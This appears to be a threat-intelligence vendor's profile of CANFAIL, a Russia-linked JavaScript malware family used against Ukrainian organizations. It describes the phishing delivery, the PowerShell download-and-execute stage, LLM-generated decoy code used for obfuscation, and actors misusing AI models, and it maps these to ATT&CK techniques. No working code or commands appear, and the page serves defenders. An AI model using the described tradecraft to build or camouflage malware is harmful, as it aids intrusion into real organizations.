Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to malware
Malware

CANFAIL

CANFAIL is an obfuscated JavaScript malware family used by a previously undocumented, suspected Russia-linked threat actor assessed as possibly affiliated with Russian intelligence services. It has been deployed primarily against Ukrainian organizations, including defense, military, government, and energy entities, with reported additional interest in aerospace and drone-linked manufacturers, nuclear and chemical research organizations, humanitarian groups, and other organizations tied to Ukraine; related activity also included targeting or reconnaissance involving Romanian and Moldovan entities.

Observed delivery is via phishing campaigns. The lures have included impersonation of Ukrainian energy organizations and a Romanian energy company, and emails contained Google Drive links to RAR archives carrying the malware. CANFAIL was often disguised with a double extension such as .pdf.js to appear as a document. On execution, the obfuscated JavaScript runs PowerShell to download and execute an additional stage, most commonly a memory-only PowerShell dropper, while displaying a fake error popup or message to the victim.

Reporting also links CANFAIL with the malware family LONGSTREAM as part of Russia-nexus operations targeting Ukrainian organizations. In that context, CANFAIL is described as using LLM-generated decoy logic: large volumes of plausible-looking but functionally inert code woven into the malware to camouflage malicious functionality and hinder analysis and detection. Multiple sources cited in the content describe CANFAIL and LONGSTREAM as examples of AI-enabled malware using benign-looking filler code for obfuscation.

Google Threat Intelligence Group identified CANFAIL in phishing operations and reported that the associated actor used LLMs not only in malware obfuscation but also to support reconnaissance, social-engineering lure creation, and basic technical guidance for post-compromise activity and C2 setup. Related reporting linked the actor to the PhantomCaptcha campaign documented in October 2025.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
MITRE ATT&CK

Techniques & procedures

13 distinct techniques documented for this family, organized by ATT&CK tactic.

Resource Development

1 technique
T1587.001MalwareEvidence1

threat actors are using large language models to write polymorphic loaders... Public reporting now names specific actor clusters in the wild... APT27... used Gemini to accelerate development of fleet management tooling... APT45... sending thousands of repetitive prompts that recursively analyze CVEs and validate proof-of-concept exploits

Initial Access

2 techniques
T1566PhishingEvidence2

"Recent phishing campaigns have involved the threat actor impersonating legitimate national and local Ukrainian energy organizations to obtain unauthorized access to organizational and personal email accounts."

T1566.002Spearphishing LinkEvidence2

"The attack chains seemingly contain LLM-generated lures and embed Google Drive links pointing to a RAR archive containing CANFAIL malware."

Execution

3 techniques
T1059.001PowerShellEvidence2

"...designed to execute a PowerShell script that, in turn, downloads and executes a memory-only PowerShell dropper."

T1059.007JavaScriptEvidence2

"CANFAIL is an obfuscated JavaScript malware that's designed to execute a PowerShell script..."

T1204User ExecutionEvidence1

“Phishing emails… contain… Google Drive links which host a RAR archive…”

Stealth

5 techniques
T1027Obfuscated Files or InformationEvidence6

Meanwhile, Russia-associated threat actors were reportedly using AI-generated decoy code to conceal malware strains such as CANFAIL and LONGSTREAM.

T1027.001Binary PaddingEvidence1

CANFAIL and LONGSTREAM... ask an LLM to generate large blocks of plausible-looking but functionally inert code, woven through the malicious logic as camouflage. One LONGSTREAM sample reportedly contained 32 separate instances of code querying the system’s daylight saving status

T1027.002Software PackingEvidence2

...two newly disclosed malware families that leverage AI for evasive techniques such as polymorphism...

T1036MasqueradingEvidence4

CANFAIL and LONGSTREAM... ask an LLM to generate large blocks of plausible-looking but functionally inert code, woven through the malicious logic as camouflage... making the malware look like legitimate administrative software to a casual reviewer.

T1497Virtualization/Sandbox EvasionEvidence2

...the development of evasive malware. The report highlighted two previously discovered and two newly disclosed malware families that leverage AI for evasive techniques...

Discovery

1 technique
T1497Virtualization/Sandbox EvasionEvidence2

...the development of evasive malware. The report highlighted two previously discovered and two newly disclosed malware families that leverage AI for evasive techniques...

Command and Control

1 technique
T1105Ingress Tool TransferEvidence2

“…runs a PowerShell script to download and execute a second-stage payload…”

Exfiltration

1 technique
T1567Exfiltration Over Web ServiceEvidence1

“Messages include Google Drive links hosting a RAR archive with CANFAIL malware…”

ACTIVITY FEED

Recent activity

14 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

14 SOURCESView more in app
malware newsNews
May 29, 2026
The AI-Embedded SOC: An Operating Model for the Asymmetry Era - Malware News - Malware Analysis, News and Indicators

Malware linked to Russia-nexus operations that uses LLM-generated inert code as camouflage to hinder analysis and detection.

Read more
detectNews
May 29, 2026
The AI-Embedded SOC: An Operating Model for the Asymmetry Era | by Omar Tarek Zayed | May, 2026 | Detect FYI

Malware linked to Russia-nexus operations that uses LLM-generated inert code as camouflage to make malicious logic appear more legitimate and hinder analysis.

Read more
ahnlab asec blogNews
May 27, 2026
The proliferation and evolution of AI-powered hacking tools - how generative AI has changed the cyber attack ecosystem and response strategies - ASEC

Malware used against Ukrainian targets that employs large volumes of LLM-generated decoy code to conceal malicious behavior and hinder analysis and detection.

Read more
cysecurity newsNews
May 25, 2026
Google Detects AI-Generated Zero-Day Exploit Targeting Web Admin Tool - CySecurity News - Latest Information Security and Hacking Incidents

A malware strain mentioned as being concealed with AI-generated decoy code by Russia-associated threat actors.

Read more
+10 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping13

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.